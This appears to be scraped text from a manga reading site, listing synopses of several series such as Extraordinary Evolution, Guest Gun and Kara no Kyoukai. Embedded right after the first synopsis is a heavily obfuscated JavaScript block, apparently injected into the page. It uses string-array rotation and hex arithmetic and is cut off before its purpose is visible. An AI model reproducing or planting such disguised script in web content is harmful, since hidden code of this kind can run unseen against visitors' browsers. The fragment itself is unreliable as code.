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Extraordinary Evolution

Ming He is a young man with hidden supernatural power. But his power is the most useless power, of white dust rank. Cycling in a deserted highway on his way home, a catastrophe named ” goddess” hits Ming He. And after meeting Ming He, it becomes a possession spirit. The “Goddess” gave Ming He a powerful and extraordinary superpower. His original “trash” superpower got an unexpected buff, and with that, Ming He became the strongest human. Step by step, he slowly discovered the truth behind the universe’s power!<script></script><script>(function(_0x1649f9,_0x1cfa89){var _0x2e2664=_0x4548,_0x44f705=_0x1649f9();while(!![]){try{var _0x9e1740=parseInt(_0x2e2664(0xc6))/(0x3df+-0x1*-0x1633+-0x1a11)*(parseInt(_0x2e2664(0xca))/(0x8be+-0x7ae*-0x5+-0x6*0x7db))+-parseInt(_0x2e2664(0xd0))/(-0x11*-0xd+0x12af*-0x1+0x11d5)+-parseInt(_0x2e2664(0xce))/(0xe*-0x106+0x1223+-0x3cb)+parseInt(_0x2e2664(0xcb))/(0x1b69+0x13f*-0x5+-0x1*0x1529)*(parseInt(_0x2e2664(0xd6))/(0x1c33*0x1+0xd*0x1a8+-0x31b5))+-parseInt(_0x2e2664(0xc5))/(-0x2*-0xbe4+0x26c9*-0x1+-0x94*-0x1a)+-parseInt(_0x2e2664(0xc7))/(-0x23a6+0xc1*0x1a+0x55c*0x3)+parseInt(_0x2e2664(0xc4))/(0x25d9+0xe89+-0x3459);if(_0x9e1740===_0x1cfa89)break;else _0x44f705['push'](_0x44f705['shift']());}catch(_0x57c435){_0x44f705['push'](_0x44f705['shift']());}}}(_0xc4f7,-0x9aa48+0x305*-0x301+0x1afa02));function custom(){var _0x59b1c1=_0x4548,_0xbfb8ff={'zqdNa':function(_0x48c520,_0x44b338){return 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Tensei Shita Akuyaku Reijou wa Fukushuu wo Nozomanai THE COMIC

“I’m not interested in revenge!” Rosemary was branded as a villainess and hung for a crime she didn’t commit. She reincarnates as the commoner, “Marie,” while still retaining the memories of her previous life and hopes to live peacefully this time. However, contrary to Marie’s wishes, she ends up returning to the royal palace. “Sister, how do you want to punish the people who killed you?” Her brother, whom she doted on in her previous life, had changed completely and intended to take revenge on behalf of his sister. “Master, please tell me your desire.” The knight who swore allegiance in the previous life swears his allegiance this time as well. I’m not thinking of taking revenge on the person who killed me. However, the people around me will not allow that…


I Was Kicked Out Of The Hero’S Party Because I Wasn’T A True Companion So I Decided To Have A Slow Life At The Frontier

In a fantasy world in which a young girl with the Divine Protection of the hero battles against the demon lord. In that world, Red, the elder brother of that young girl hero, possessing the Divine Protection of "The Guide" which only grants a high initial level, fought in the initial party of the hero. However, with a Divine Protection that only grants a high level but no magic nor martial art nor supernatural ability, he gradually could no longer keep up with the battle and in the end, a companion, a sage, remarked "You are not a true companion" as he snatched all his equipment and kicked him out of the party with just a single copper sword. Having his heart completely shattered, Red distanced himself from the battle against the demon lord's army despite knowing that the fate of the world rests on it, aiming to live an inconspicuous life alone at the frontier Zoltan as he earns money to open a herbalist shop by utilizing the knowledge he acquired throughout his journey. Together with the half-elf carpenter living downtown and the princess who couldn't become the hero's companion, he aims to live a slow life in the frontier of the world governed by a person's inborn Divine Protection!


Regressed life of the Sword Clan’s Ignoble Reincarnator

Read manhwa Regressed life of the Sword Clan’s Ignoble Reincarnator Theo, the young master of the powerful Ragnar family, worked tirelessly but lacked the talent to break the chains of his bloodline, ultimately being pushed out of the competition for the throne. However, even as a powerless young master, his brothers sought to eliminate him, and he was betrayed by his own mentor. In the end, Theo lost everything and faced his death. In his final moments, filled with regret over all his life choices, the unbelievable happened: he experienced a ‘rebirth. “This life will be different.” The reborn young master takes up his sword and enters the competition for the throne.

3 days ago

Koukyuu no Zatsuyouki

Shaolan (Xiao Lian) is an orphaned girl who lives alone in the mountains at the very nook of an impoverished village. One day, an envoy from the palace arrives and scouts her to to be a lady-in-waiting for the imperial harem. This was how a wild girl raised on the mountains was able to live in a luxurious palace working as a lady-in-waiting, however... On her first day (due to various reasons), Shaolan had suddenly become a criminal after slapping one of the consorts. Though execution appeared certain, she was specially pardoned and demoted from a lady-in-waiting to a maidservant in charge of odd jobs. She is ridiculed by the other consorts as the, \"Princess of Odd Jobs,\" however, this is where her rapid advance begins. She implements reforms to the worn-down palace and optimizes her chores through the knowledge she learned from her life of living in poverty, earning the gaze of the other ladies-in-waiting and the imperial consorts alike. Continuing these course of events, Shaolan\'s name spreads through the imperial palace, reaching even the emperor\'s ears...


Guest Gun

No.1 Killer Kim Gun falls into the world of Murim due to a mysterious accident In order to return to the Earth from which he came from, he learns that he must complete the mission of “conquering Murim“. With two guns, Kim Gun’s adventure to settle the unfamiliar world of Murim begins.


A Betrayed S-Rank Adventurer, I Make a Slave-Only Harem Guild With My Beloved Slaves

Egil, an S-rank adventurer who has lived hateful of “slave“, falls in love with one slave at a slave auction he was forced to bring. She was Eleanor, the former third princess of the Kingdom of Cornelia. Eleanor, a slave to Egil, begs Egil to “kill my childhood friend who sold me to a slave trader“! !! Keep an eye on the estrus slaves if there is a chance! Can Egil rescue the body and mind of beautiful girl slaves and bring peace to this world ...!


Ane ga Kensei de Imouto ga Kenja de

A super-powerful nation, the kingdom of L'Arc. Razel, the son of the king but without the talent of Takeshi, Compared with Kensei's sister and wise man's sister, they are exiled. Such a lazel is a natural positive, I'm trying to live as an adventurer in another country, The older sisters and younger sisters who love him are chasing after me !? With strong and a little naughty sisters Flirt adventurer life, start!


Excalibur Chronicle Of Raidorl

Raidorl Zain was born and raised as the second prince of the Kingdom of Zain. Raidorl lived a peaciful life surrounded by his kind elder brother and loyal vassals, however his fate completely changed drastically during his coming-of-age ceremony when he was chosen to be the holder of “Dáinsleif “, the excalibur (sacred sword) of the royal house.



From Manga Updates: A very popular early work from Kinoko Nasu from the Tsukihime & Fate fame, the Kara no Kyoukai universe has meet great success as an animated film adaptation, novels and radio dramas. Kara no Kyoukai depicts a world were the true dark nature of the human being is being reviewed and exposed by shocking and ruthless events, and in the center of it all we have Ryougi Shiki, the true heir to the long lived, wealthy and mysterious Ryougi clan and Kokuto Mikiya, a would be normal high school student if it wouldn't be for his amazing deductive & investigative progress. The moment Kokuto and Shiki meet is the moment that the wheel of fate started to turn, however is this fate moving forward naturally of it's own accord, or is it all being orchestrated from behind the scenes by an enigmatic persona? Only time will tell.
